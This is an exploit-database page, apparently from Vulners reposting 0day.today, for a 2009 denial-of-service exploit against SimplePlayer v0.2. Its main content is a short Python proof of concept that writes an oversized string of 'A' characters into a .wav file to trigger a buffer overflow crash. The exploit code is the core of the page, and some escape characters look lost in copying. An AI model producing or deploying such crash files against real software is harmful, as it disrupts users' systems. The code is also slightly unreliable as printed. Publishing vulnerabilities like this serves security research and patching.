Lucene search
K

SimplePlayer v0.2 0day (.wav) overflow DOS Exploit

🗓️ 31 Dec 2009 00:00:00Reported by mr_meType 
zdt
 zdt
🔗 0day.today👁 26 Views

SimplePlayer v0.2 0day (.wav) overflow DOS Exploit. Python script creates a malicious .wav file, causing buffer overflow on SimplePlayer v0.

Code
==================================================
SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
==================================================


# Title: SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
# CVE-ID: ()
# OSVDB-ID: ()
# Author: mr_me
# Published: 2009-12-31
# Verified: yes

view source
print?
#!/usr/bin/python
#
# Title: SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
# Found by: mr_me (seeleymagic [at] hotmail [dot] com)
# Greetz to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT
# Tested on: Windows XP SP3
# Happy New Year!
#
# POC:
 
crash = ("x41" * 36000);     # overwrite the buffer at 262 bytes
try:
     file = open('mr_me_dos.wav','w');
     file.write(crash);
     file.close();
     print "[+] Created mr_me_dos.wav file"
except:
     print "[-] Error cant write file to systemn";



#  0day.today [2018-03-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation